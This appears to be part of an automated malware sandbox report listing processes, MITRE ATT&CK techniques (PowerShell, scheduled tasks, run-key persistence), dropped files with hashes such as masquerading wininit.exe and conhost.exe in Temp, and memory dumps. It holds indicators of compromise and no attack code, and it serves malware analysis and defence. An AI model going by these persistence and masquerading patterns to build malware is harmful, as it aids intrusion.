C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD5b7100fd3a21788520d2588b8d86676db
SHA185bbcaee5eea20b8b3ca77839276792696579e88
SHA2560340c578f19aa5fb6ec208a5f30eabe3addf291a98fcc6d87e560b4b2835772c
SHA512214c558e663b47acec9e56ca6b04fe9c33529f5a4f7abdaa6cf69b9804b3ef30cfdd101972ca653aee8546492cf93ce3a1345591c3c1b29cb99b59767898e53a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7zip.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571c4b1323b5c2b0b3dce79a418170c57
SHA1f2484755165cc812bd2017c3ff93d7aef8e9f642
SHA256b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872
SHA5129048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5dbb22d95851b93abf2afe8fb96a8e544
SHA1920ec5fdb323537bcf78f7e29a4fc274e657f7a4
SHA256e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465
SHA51216031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD561f013e52f57493aee1a15d4b65ead11
SHA1037e4a5fe17081c6be734465eabd0adcf681864e
SHA256c8a0fb21052edd3560d72288fe299ef83b428bf891e33090b2347bdc172da59f
SHA51255051a9bad4190e3322f3ff7a8ac674d3908dd7d6b5dc2b35722cad02ea0490912e5e7072a576e397d7cd077e301e13b238a1fba9e0ac69d0a98d0bd5136b526
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD593c898ff539e0358970b86253462586a
SHA18e533a5ea1555e87d181200cf0c5d692aca1a2ae
SHA256a2cfc0dd6cddb415482e4774a1b6669a8b76572fa7ab7db98aa79f1fe7d0fc49
SHA5125c93a1d184c64628442142e952d15a8acf3c0aec259e1781f522f01dae8a2ef2ad830eb8eefae97df3038e5c12841997131b16dfab4c87712cee2fb62424cc43
-
C:\Users\Admin\AppData\Local\Temp\7zip.exeFilesize
81KB
MD56fac9c3612488908d9aa6ed9e8234f9f
SHA18b36017162e06e76a450e2ecceee4d3a68bb3905
SHA2560ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606
SHA512e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exeFilesize
27KB
MD54daae2de5a31125d02b057c1ff18d58f
SHA1e1d603edfcc150a4718e2916ae3dda3aa9548dc8
SHA25625510f3aa1b879ea92a3cba9583d73e447b8765bae6dfcc4954bb72df5beaa7f
SHA5127cda96a69f9cddab307f3f08e1f38a4d059f0cc7f7119d4a48891efdb01cf101ebcc06cb2ce0702ea2d689d27ee45faddc0a13cd72503c609c4e544919549a2a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1prhc1z1.ynr.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\conhost.exeFilesize
63KB
MD5ec57b49d155e05d971f73e2eb3d3d01f
SHA1f8537e9b44342a71f1f8bf48548b27574f17ff7c
SHA256baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c
SHA512e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533
-
C:\Users\Admin\AppData\Local\Temp\wininit.exeFilesize
409KB
MD5301613f1fcda48ebade4c197175be1a0
SHA103f58ab72f3c2d991418861adfc9c3b3289640a0
SHA2561772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41
SHA512375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525
-
C:\Users\Admin\AppData\Roaming\Windows_Log_778.batFilesize
811KB
MD5add48f177d5e0a81fca63ca2c6e5c9e2
SHA15d43d5b761c889443d7b48dd962b9d20514edc5f
SHA25699cee0b28ecb0e558fca04fb56c8b61abf7af751fbef519328c2da4f19fe9d93
SHA51281ecd172e609eb80cf358b45cdd32cc7d1f6b8d8f62d3933f7a5be0b1a786e2eefeab8402f4f4e710b11d9d8dc8ddde44d59827bb4e63fb58b8acca4c14c8d33
-
C:\Users\Admin\AppData\Roaming\Windows_Log_778.vbsFilesize
115B
MD5e6243915c49e638313bb0168da0b06db
SHA1c86f8d8f78cf3efa068c0ac880d7c82ca672a0e9
SHA256da75649585204d2daac1f30303ce5d3f780b26a58e5d7b6fb499090a5709bb3e
SHA5127e44e829eb044adec653c112232b59b949d01be7fd3f262a1c625bec9c6620f6394b4226221e81b0dc283bce0dcf77bb3cb23a04404298d105e27b93480da713
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
memory/416-266-0x00000234833E0000-0x000002348340B000-memory.dmpFilesize
172KB
-
memory/416-267-0x00007FF7F9ED0000-0x00007FF7F9EE0000-memory.dmpFilesize
64KB
-
memory/416-260-0x00000234833E0000-0x000002348340B000-memory.dmpFilesize
172KB
-
memory/528-271-0x000001437AF20000-0x000001437AF4B000-memory.dmpFilesize
172KB
-
memory/632-227-0x000001A22D3A0000-0x000001A22D3CB000-memory.dmpFilesize
172KB
-
memory/632-234-0x00007FF7F9ED0000-0x00007FF7F9EE0000-memory.dmpFilesize
64KB
-
memory/632-226-0x000001A22D3A0000-0x000001A22D3CB000-memory.dmpFilesize
172KB
-
memory/632-233-0x000001A22D3A0000-0x000001A22D3CB000-memory.dmpFilesize
172KB
-
memory/632-225-0x000001A22D370000-0x000001A22D395000-memory.dmpFilesize
148KB
-
memory/692-245-0x00007FF7F9ED0000-0x00007FF7F9EE0000-memory.dmpFilesize
64KB
-
memory/692-238-0x000001B890970000-0x000001B89099B000-memory.dmpFilesize
172KB
-
memory/692-244-0x000001B890970000-0x000001B89099B000-memory.dmpFilesize
172KB
-
memory/960-103-0x00000000008D0000-0x00000000008E6000-memory.dmpFilesize
88KB
-
memory/976-249-0x0000028A5A1E0000-0x0000028A5A20B000-memory.dmpFilesize
172KB
-
memory/976-255-0x0000028A5A1E0000-0x0000028A5A20B000-memory.dmpFilesize
172KB
-
memory/976-256-0x00007FF7F9ED0000-0x00007FF7F9EE0000-memory.dmpFilesize
64KB
-
memory/984-61-0x000001B4AB430000-0x000001B4AB448000-memory.dmpFilesize
96KB
-
memory/1124-198-0x00007FF838660000-0x00007FF83871E000-memory.dmpFilesize
760KB
-
memory/1124-197-0x00007FF839E50000-0x00007FF83A045000-memory.dmpFilesize
2.0MB
-
memory/1124-186-0x00000197EA670000-0x00000197EA69A000-memory.dmpFilesize
168KB
-
memory/1328-1280-0x0000000000970000-0x000000000098A000-memory.dmpFilesize
104KB
-
memory/1868-111-0x0000000000660000-0x000000000066E000-memory.dmpFilesize
56KB
-
memory/1868-113-0x0000000000F80000-0x0000000000F90000-memory.dmpFilesize
64KB
-
memory/2156-28-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/2156-23-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/2156-32-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/2156-29-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/2940-1133-0x000000001C740000-0x000000001C74E000-memory.dmpFilesize
56KB
-
memory/2940-108-0x0000000000CE0000-0x0000000000CFA000-memory.dmpFilesize
104KB
-
memory/3292-1175-0x0000000000780000-0x000000000079A000-memory.dmpFilesize
104KB
-
memory/3748-222-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3748-201-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3748-206-0x00007FF839E50000-0x00007FF83A045000-memory.dmpFilesize
2.0MB
-
memory/3748-207-0x00007FF838660000-0x00007FF83871E000-memory.dmpFilesize
760KB
-
memory/3748-205-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3748-199-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3748-202-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3748-200-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4808-50-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/4808-13-0x000001E846FE0000-0x000001E847024000-memory.dmpFilesize
272KB
-
memory/4808-10-0x000001E82CA20000-0x000001E82CA42000-memory.dmpFilesize
136KB
-
memory/4808-11-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/4808-12-0x00007FF81B530000-0x00007FF81BFF1000-memory.dmpFilesize
10.8MB
-
memory/4808-0-0x00007FF81B533000-0x00007FF81B535000-memory.dmpFilesize
8KB
-
memory/4808-16-0x000001E8470B0000-0x000001E84718E000-memory.dmpFilesize
888KB
-
memory/4808-15-0x000001E846D50000-0x000001E846D58000-memory.dmpFilesize
32KB
-
memory/4808-14-0x000001E847030000-0x000001E8470A6000-memory.dmpFilesize
472KB
-
memory/4972-140-0x0000000007390000-0x000000000739A000-memory.dmpFilesize
40KB
-
memory/4972-126-0x0000000005B30000-0x0000000005B96000-memory.dmpFilesize
408KB
-
memory/4972-112-0x0000000000FB0000-0x000000000101C000-memory.dmpFilesize
432KB
-
memory/4972-127-0x0000000006730000-0x0000000006742000-memory.dmpFilesize
72KB
-
memory/4972-114-0x0000000006040000-0x00000000065E4000-memory.dmpFilesize
5.6MB
-
memory/4972-115-0x0000000005A90000-0x0000000005B22000-memory.dmpFilesize
584KB
-
memory/4972-128-0x0000000006C70000-0x0000000006CAC000-memory.dmpFilesize
240KB